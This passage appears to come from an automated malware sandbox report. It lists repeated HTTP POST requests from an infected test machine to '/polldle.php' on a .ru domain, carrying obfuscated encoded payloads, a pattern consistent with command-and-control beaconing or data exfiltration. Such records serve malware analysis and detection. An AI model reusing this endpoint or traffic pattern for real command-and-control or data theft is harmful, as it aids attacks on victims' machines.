                                                                                Data Ascii: XZQR_FZQT]UZPUYYPWZ^WRPV[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#F.0*E$8 Y%T>%,-R#=_,;'X?3W%#",4(!2#\*5#X'/\/
                                                                                Jan 11, 2025 23:34:15.611347914 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:15.876904011 CET810INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:15 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2QJolB%2F5q7j0j%2FQc2HKpTC4Rg4bcH7w85l83l3vL75S%2F%2BLLlpTSLoklvIpRh6f8yrsF0xbd6rc2bGaL1qrlXJd9c873PQ%2BdCcc%2BoqqtF5WFG4XeOauPPA5hyRQ5QVOVUo9x2xXzl"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f874f71f793-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1688&min_rtt=1478&rtt_var=975&sent=4&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2799&delivery_rate=461441&cwnd=173&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                105192.168.2.450113104.21.38.8480
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:34:16.009757996 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:16.364222050 CET2504OUTData Raw: 58 5f 51 57 5f 41 5f 5b 54 5d 55 5a 50 5a 59 5f 50 57 5a 5b 57 52 50 5c 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X_QW_A_[T]UZPZY_PWZ[WRP\[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#@:6%$%26'?#<&8+<,(13*.\628(%#X'/\/<
                                                                                Jan 11, 2025 23:34:16.477673054 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:16.639544010 CET808INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:16 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pPrwEi04Sa%2FjKkjkg3LFCaIBPWZTIV4Qy%2BZcHtNU1msBo%2BBNmNKklIk%2FWW4wmMbc6SW%2BPFQbyKEGD6xBMKqvWS64VFhU1Ew0zH1Paygvv1vvLszW3PsKjrT1GqWfulYPQSBEfMab"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f8cb82bc425-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=5071&min_rtt=1523&rtt_var=7667&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=48814&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                106192.168.2.450114104.21.38.8480
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:34:16.770922899 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:17.129864931 CET2504OUTData Raw: 58 5b 54 51 5f 43 5a 51 54 5d 55 5a 50 5d 59 5f 50 57 5a 52 57 56 50 57 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X[TQ_CZQT]UZP]Y_PWZRWVPW[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU :"2#1")_%<9#/(+^(<(&#:.B+5$+#X'/\/
                                                                                Jan 11, 2025 23:34:17.224318027 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:17.462191105 CET802INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:17 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ugLH9jEFiyAzsGHObS8DYz788VdcXJbsblSob6zLtgh%2FhYh2aL9NWXkHRGoiBX0CLqIxN2mh1ortfu5wF%2FtHg2kmv2Xs47QZAuC2ifqa2gTwoIrgFIeWLtlFmAKaCKEut4vg0yHK"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f916d88c335-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3235&min_rtt=1579&rtt_var=3905&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=98449&cwnd=164&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                107192.168.2.450115104.21.38.8480
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:34:17.583266973 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:17.942392111 CET2504OUTData Raw: 5d 5c 54 5e 5a 42 5f 58 54 5d 55 5a 50 59 59 51 50 5c 5a 5b 57 5c 50 56 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]\T^ZB_XT]UZPYYQP\Z[W\PV[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#C:31&,]&T!05W4!Y,;$<013::<^6";X(#X'/\/0
                                                                                Jan 11, 2025 23:34:18.037406921 CET25INHTTP/1.1 100 Continue


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                108192.168.2.450116104.21.38.8480
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:34:18.089493990 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 1608
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:18.442439079 CET1608OUTData Raw: 58 50 54 57 5a 46 5a 5c 54 5d 55 5a 50 5c 59 5f 50 53 5a 5c 57 53 50 5d 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XPTWZFZ\T]UZP\Y_PSZ\WSP][\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#@9 2B&$Y&"3"7/5/('+,?U%#2U9$!2']+5#X'/\/
                                                                                Jan 11, 2025 23:34:18.545063972 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:18.777568102 CET956INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:18 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OKand1D6rxIywWhu%2BlQejIh1LRDnxZD8pB8%2BEz0SFs0ChZdH8KSRr8PReKhhg96d0EjNrDkeoUqkANh1h8z5sJwTcFrkVi0S4hdkWXTvB1yaXQef%2F7nSD%2FtiYd54wX6vjeqnQKN3"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f999e4d1a1f-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3361&min_rtt=2032&rtt_var=3420&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1927&delivery_rate=115278&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 39 38 0d 0a 0e 11 2e 56 30 1d 38 5d 2a 07 05 12 2d 28 09 1f 2c 21 2b 00 2b 22 36 17 20 17 1a 5c 32 21 24 19 3e 3a 00 1c 3f 03 37 1d 23 10 36 11 31 39 23 46 0c 1d 21 01 3d 06 33 0b 31 3f 27 04 29 33 35 02 32 32 23 1c 3d 24 0a 0f 29 14 2a 04 22 05 2a 1b 3f 0b 2a 09 3e 1b 0b 04 2c 0f 2f 5d 31 3a 2e 51 0f 16 21 50 35 32 2c 58 23 04 38 04 25 33 23 59 28 42 3c 11 31 39 3f 09 28 23 0c 5b 28 31 2c 56 30 3e 3f 1d 25 3f 25 05 3c 07 37 53 28 3b 24 5c 23 0f 28 56 05 3f 5b 4d 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 98.V08]*-(,!++"6 \2!$>:?7#619#F!=31?')3522#=$)*"*?*>,/]1:.Q!P52,X#8%3#Y(B<19?(#[(1,V0>?%?%<7S(;$\#(V?[M0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                109192.168.2.450117104.21.38.8480
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:34:18.209371090 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:18.567430973 CET2504OUTData Raw: 5d 5c 51 52 5a 45 5f 5d 54 5d 55 5a 50 59 59 5c 50 53 5a 5f 57 56 50 5d 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]\QRZE_]T]UZPYY\PSZ_WVP][\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#B.-2^,%9$%T Z*;;?)/T&#:R-$4"1'[(#X'/\/0
                                                                                Jan 11, 2025 23:34:18.674092054 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:18.915122032 CET802INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:18 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pVHmhih8CTHdqwFCGlVU0MPbus%2Fk5mlcg5zzy0DDQc9QmKceEgMqptXTgXja4EnMulrX4qXVr3mItO2QNFu33aPB4BbWOoCZwrZyf7tmvxpRXE6vZAfuPqIprr7Oa3%2FMmmdWSltX"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f9a6d300ca4-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3987&min_rtt=1635&rtt_var=5318&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=71369&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                110192.168.2.450118104.21.38.8480
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:34:19.047813892 CET295OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Jan 11, 2025 23:34:19.395584106 CET2504OUTData Raw: 5d 5b 54 5f 5f 41 5a 5a 54 5d 55 5a 50 59 59 5b 50 52 5a 58 57 57 50 5c 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ][T__AZZT]UZPYY[PRZXWWP\[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#92C1;?21=X$/*7,1Z,;^<0%3S.8"!8<5#X'/\/0
                                                                                Jan 11, 2025 23:34:19.512047052 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:19.680515051 CET804INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:19 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GR9uYXYgGNVf2YoXjeW8GAzeBOnqqGCgxwfJSowXiDqCiAWz0%2Ba9myu%2FolvBXvD%2BLGOxGUldlLC055uaArVOwRO8ibKvEc0OWqYnvbVkLscMYUkrdDx1gfuiVyL0RtXAxYQeQMTS"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f9fac876a5b-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4770&min_rtt=1726&rtt_var=6735&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2799&delivery_rate=55985&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                111192.168.2.450119104.21.38.8480
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:34:19.827714920 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:20.176774025 CET2504OUTData Raw: 5d 5b 54 55 5f 41 5a 50 54 5d 55 5a 50 59 59 5e 50 57 5a 5d 57 5d 50 5e 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ][TU_AZPT]UZPYY^PWZ]W]P^[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU -%$(8]&!&0"#,:,(#(U1U94(Z"18(#X'/\/0
                                                                                Jan 11, 2025 23:34:20.281785011 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:20.523263931 CET802INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:20 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ngITlRiTs2SIKAN7bL0xo9lRWSdHC9ZVAvLnYOMDw0Hg0mlWiGrQTQEUzftOvsIfBzjF0oe%2FzcGIJTuwc7wSvlp%2FedCtbfFp8SgtDovefMygjgB1fjVNB4yLzXDo3eKZDswDztlG"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085fa47b478c75-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4418&min_rtt=2098&rtt_var=5427&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=70671&cwnd=200&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                112192.168.2.450120104.21.38.8480
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:34:20.652486086 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2500
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:21.004897118 CET2500OUTData Raw: 58 5f 51 53 5f 43 5a 5e 54 5d 55 5a 50 5c 59 5f 50 5c 5a 5b 57 5c 50 5f 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X_QS_CZ^T]UZP\Y_P\Z[W\P_[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU ,3218$%%\%,1S7?:;8++0&-#"'?5#X'/\/
                                                                                Jan 11, 2025 23:34:21.097393036 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:21.372791052 CET800INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:21 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8OejndMpbNJ4FkbkK0ij6b9YU6Cz9N8qyRnpuy20QzyxGPuh1DlMfBJWBl4Euu7SC%2BJoFhggZMjZHHM5L865FF2Pxk4S2k9Ux5Rmy7UtIXTY2zCwnqZyMVoj112k4qY3xuV8zwnd"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085fa99c888c8d-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3630&min_rtt=1982&rtt_var=4039&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2819&delivery_rate=96267&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                113192.168.2.450121104.21.38.8480
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:34:21.515712976 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:21.864425898 CET2504OUTData Raw: 5d 59 54 55 5a 41 5a 50 54 5d 55 5a 50 54 59 5d 50 57 5a 59 57 57 50 5f 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]YTUZAZPT]UZPTY]PWZYWWP_[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#A:%$+$[&T9X0?5T#:,+$+,0102S. "20(#X'/\/
                                                                                Jan 11, 2025 23:34:21.959522009 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:22.203393936 CET803INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:22 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jZHZfbJYFNMVugRt1Q%2FKz8nycdGlv8VWkRchUBH0tBHS6rWzi6NbaWkkcMftetNMCrVsF0yFDvlU1fWoQBTuyoDCnCNQcQBdA%2FXnMdKKRduTW1xvuWbeOp7k0uVGuiEruAdwJl5L"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085faef8891a07-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3263&min_rtt=1966&rtt_var=3332&sent=4&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=118237&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                114192.168.2.450122104.21.38.8480
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:34:22.378753901 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:22.723790884 CET2504OUTData Raw: 58 51 54 57 5a 44 5a 5b 54 5d 55 5a 50 5f 59 5e 50 5c 5a 5b 57 54 50 5c 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
